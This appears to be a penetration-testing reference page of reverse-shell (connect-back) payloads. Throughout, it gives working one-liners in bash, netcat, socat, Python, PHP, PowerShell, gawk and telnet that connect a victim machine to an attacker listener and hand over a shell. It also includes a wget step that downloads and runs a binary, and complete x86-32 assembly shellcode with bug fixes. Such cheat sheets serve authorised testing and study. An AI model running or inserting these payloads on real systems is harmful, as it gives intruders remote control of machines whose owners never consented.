
Connect-Back (Reverse Shell)

Connect-back (also called call-back or reverse) shellcode creates a new socket on the target system and connects out to the attacker's IP address and port, where a listener is already waiting. Because the target initiates the connection, this works even when inbound connections to the target are blocked, as long as outbound traffic is allowed — egress filtering from a trusted internal network is usually far more liberal than ingress filtering — and provided the exploit itself can reach the target. Most examples below use 10.0.0.1 / 4242 as the listener address and port; replace them with your own.

Examples

Bash TCP

# /dev/tcp/HOST/PORT is implemented by bash itself, not by the kernel: run these under bash
# (a /bin/sh that is dash will not open it). Interactive bash, stdout+stderr and stdin on the socket.
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

# fd 196 is opened read/write on the socket by the outer bash, then sh (any sh, it only inherits
# the descriptor) gets stdin/stdout/stderr pointed at it. The leading `0<&196` runs before fd 196
# exists and only yields a "Bad file descriptor" warning; it can be dropped.
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196

# login shell (-l runs profile scripts, which may log the login); stdout goes to the socket,
# then stdin and stderr are tied to the same descriptor
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

Bash UDP

Victim:
# /dev/udp is the datagram counterpart of /dev/tcp; both it and the `>&` redirection are bash
# features, so invoke this with bash where /bin/sh is not bash. UDP has no handshake, so start
# the listener first — nothing queues the "connection" until the listener is up.
sh -i >& /dev/udp/10.0.0.1/4242 0>&1

Listener:
# -u UDP, -l listen, -v verbose, -p local port
nc -u -lvp 4242

Netcat Traditional

# -e hands the program's stdin/stdout to the socket. It exists in netcat-traditional and ncat
# builds only; OpenBSD nc has no -e, so check `nc -h` on the target before relying on it.
nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
# -c runs the given string through /bin/sh (ncat / GNU netcat); same availability caveat as -e
nc -c bash 10.0.0.1 4242

socat

# attacker: bind the local tty to the listening socket in raw mode (raw,echo=0) so line editing
# and Ctrl-C are forwarded to the remote shell instead of being handled locally.
# If socat exits uncleanly the terminal may be left raw — run `reset` to recover it.
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242

# victim: bash on a pseudo-terminal (pty); setsid detaches it from the calling session,
# sigint forwards Ctrl-C, sane sets usable tty modes. Gives a fully interactive shell.
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242

# NOTE(review): this fetches an unpinned binary from a third-party GitHub repository (master,
# no checksum) and executes it. Verify a known-good hash, or pin a commit, before running it on
# an engagement. -q also hides wget errors, so a failed download silently leaves nothing to run.
user@victim$ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242

Python IPv4

# listener address/port come from the RHOST/RPORT environment variables so the Python one-liner
# itself holds no address; fds 0,1,2 are dup2'd onto the socket and pty.spawn gives a tty-backed sh
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Python IPv6

# AF_INET6 connect takes a 4-tuple (host, port, flowinfo, scope_id); the trailing 2 is the
# interface index. NOTE(review): scope_id only matters for link-local (fe80::) targets —
# for a global address like the placeholder here it can be 0.
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

PHP

# The first six variants assume the socket fsockopen() opened is file descriptor 3 (<&3 >&3 2>&3).
# That holds for a fresh `php -r` process but not necessarily under a web server or when other
# descriptors are already open — try 4, 5 or 6 if the shell never connects. They differ only in
# which PHP function runs the command, which matters when some are disabled via disable_functions.
php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
# proc_open passes $sock as the child's fds 0/1/2 directly, so it does not depend on the fd number
php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Powershell

# Reads a command from the socket, runs it with iex (Invoke-Expression, stderr merged via 2>&1),
# and writes the output plus a "PS <cwd>> " prompt back; loops until the stream is closed.
# -nop = -NoProfile. Both directions are ASCII-encoded, so non-ASCII output is mangled.
# NOTE(review): iex on attacker-supplied text is the point here, but it is also exactly what
# AMSI/script-block logging flags — expect this to be caught on a monitored host.
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

AWK

# gawk only: /inet/tcp/0/HOST/PORT is a gawk special file and |& is the gawk coprocess operator,
# so mawk or busybox awk will not run this. Each line received on the socket is executed as a
# shell command (`c |& getline`) and its output is written back; "exit" ends the loop.
awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

telnet

On the attacker machine, start two listeners (commands are typed into the first, output appears on the second):
# 8080: attacker types commands here; 8081: the victim shell's output arrives here
nc -lvp 8080
nc -lvp 8081

On the victim machine, run the command below:
# The 8080 session's output (attacker keystrokes) is piped into /bin/sh's stdin; the shell's
# stdout is piped into the 8081 session. stderr is not redirected and stays on the victim side,
# so failed commands produce no visible output on the attacker's 8081 listener.
telnet <Your_IP> 8080 | /bin/sh | telnet <Your_IP> 8081

Assembly (Linux x86-32, NASM syntax)

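; Linux x86-32 connect-back shell, NASM syntax.
; Build: nasm -f elf32 rev.asm && ld -m elf_i386 -o rev rev.o
;
; On 32-bit Linux socket() and connect() are reached through the multiplexed
; socketcall syscall (nr 102): ebx = sub-call number, ecx = pointer to an
; array holding the sub-call's arguments. Syscall number in eax, return in eax.
;
; NOTE(review): fixes relative to the earlier listing on this page —
;   * ebx (socketcall sub-call) was never set before socket();
;   * nr 101 is ioperm, not connect — connect is socketcall sub-call 3;
;   * the sockaddr_in lacked sin_family and stored the address in host order
;     (0x7f000001 pushed little-endian is 1.0.0.127, not 127.0.0.1);
;   * ebx, holding the saved sockfd, was zeroed right before the dup2 loop;
;   * eax was not reloaded with the dup2 number on each iteration, and the
;     counter started at 2, so the loop ran twice (fds 1 and 2 only).
;
; 127.0.0.1 / 4444 are placeholders. The address dword contains NUL bytes,
; which only matters if these bytes must survive a C-string copy; pick an
; address/port without zero octets or encode them if that is the delivery path.

SYS_EXIT        equ 1
SYS_EXECVE      equ 11
SYS_DUP2        equ 63
SYS_SOCKETCALL  equ 102
SC_SOCKET       equ 1           ; socketcall sub-call: socket()
SC_CONNECT      equ 3           ; socketcall sub-call: connect()
AF_INET         equ 2
SOCK_STREAM     equ 1
SOCKADDR_LEN    equ 16          ; sizeof(struct sockaddr_in)
PORT_BE         equ 0x5c11      ; htons(4444): bytes 11 5c once pushed little-endian
ADDR_BE         equ 0x0100007f  ; 127.0.0.1: bytes 7f 00 00 01 once pushed little-endian

section .text
    global _start

_start:
    ; sockfd = socket(AF_INET, SOCK_STREAM, 0)
    xor     eax, eax
    xor     ebx, ebx
    push    eax                     ; protocol = 0
    push    byte SOCK_STREAM
    push    byte AF_INET
    mov     ecx, esp                ; ecx -> {AF_INET, SOCK_STREAM, 0}
    mov     bl, SC_SOCKET
    mov     al, SYS_SOCKETCALL
    int     0x80
    mov     edi, eax                ; keep sockfd in edi: nothing below touches edi

    ; connect(sockfd, &{AF_INET, htons(4444), 127.0.0.1, sin_zero}, 16)
    ; struct is built low-address-first by pushing its fields in reverse order
    xor     eax, eax
    push    eax                     ; sin_zero[4..7]
    push    eax                     ; sin_zero[0..3]
    push    dword ADDR_BE           ; sin_addr   (network byte order)
    push    word PORT_BE            ; sin_port   (network byte order)
    push    word AF_INET            ; sin_family
    mov     ecx, esp                ; ecx -> struct sockaddr_in
    push    byte SOCKADDR_LEN       ; addrlen
    push    ecx                     ; addr
    push    edi                     ; sockfd
    mov     ecx, esp                ; ecx -> {sockfd, addr, addrlen}
    mov     bl, SC_CONNECT          ; ebx was 1 with zero upper bytes, so ebx = 3 now
    mov     al, SYS_SOCKETCALL
    int     0x80
    test    eax, eax                ; connect() returns 0 on success, -errno on failure
    jnz     .fail                   ; do not hand a shell to a dead descriptor

    ; dup2(sockfd, 2); dup2(sockfd, 1); dup2(sockfd, 0)
    mov     ebx, edi                ; oldfd = sockfd
    xor     ecx, ecx
    mov     cl, 3                   ; newfd counts 2, 1, 0
.dup_loop:
    dec     ecx
    xor     eax, eax                ; eax holds dup2's return after each call: reload nr
    mov     al, SYS_DUP2
    int     0x80
    test    ecx, ecx                ; set flags freshly after the syscall
    jnz     .dup_loop

    ; execve("/bin//sh", {"/bin//sh", NULL}, NULL)
    ; "//sh" pads the path to 8 bytes so it can be pushed as two dwords with no NUL
    xor     eax, eax
    push    eax                     ; string terminator
    push    0x68732f2f              ; "//sh"
    push    0x6e69622f              ; "/bin"
    mov     ebx, esp                ; ebx -> "/bin//sh"
    push    eax                     ; argv[1] = NULL; the same slot doubles as an empty envp
    mov     edx, esp                ; envp
    push    ebx                     ; argv[0] -> "/bin//sh"
    mov     ecx, esp                ; ecx -> argv
    mov     al, SYS_EXECVE
    int     0x80                    ; only returns on failure; fall through to exit

.fail:
    ; exit(1): reached when connect() failed or execve() returned
    xor     eax, eax
    xor     ebx, ebx
    inc     ebx                     ; status = 1
    mov     al, SYS_EXIT
    int     0x80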